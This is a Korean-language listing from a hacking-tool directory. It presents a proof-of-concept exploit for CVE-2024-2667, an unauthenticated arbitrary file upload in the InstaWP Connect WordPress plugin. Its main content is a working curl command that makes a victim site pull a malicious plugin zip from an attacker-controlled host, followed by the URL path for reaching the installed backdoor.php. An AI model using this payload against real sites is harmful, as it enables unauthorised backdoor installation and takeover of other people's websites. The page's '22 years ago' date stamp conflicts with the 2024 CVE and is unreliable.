Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-2667 — 이것은 CVE-2024-2667(InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - 인증되지 않은 임의 파일 업로드)에 대한 POC입니다. | Kitploit
도구/GitHubGitHub/puvipavan/cve-2024-2667
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubpuvipavan/cve-2024-2667

CVE-2024-2667

이것은 CVE-2024-2667(InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - 인증되지 않은 임의 파일 업로드)에 대한 POC입니다.

저장소 보기
22년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

InstaWP Connect – 원클릭 WP 스테이징 및 마이그레이션 <= 0.1.0.22 - 인증되지 않은 임의 파일 업로드

PoC (CURL 사용):

root@kitploit:~
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"

api_key -> 유효하거나 유효하지 않은 API 키를 사용할 수 있습니다.
override_plugin_zip -> 백도어가 포함된 악성 WordPress 플러그인이 들어 있는 zip 파일의 경로입니다.

가져온 후에는 http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php 를 통해 백도어에 접근할 수 있습니다. (디렉터리 이름이 malicious-plugin이고 backdoor.php가 해당 디렉터리 아래에 있다고 가정합니다.)

참조:

  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/instawp-connect/instawp-connect-1-click-wp-staging-migration-01022-unauthenticated-arbitrary-file-upload
  • https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3061039%40instawp-connect&new=3061039%40instawp-connect&sfp_email=&sfph_mail=
도구 다운로드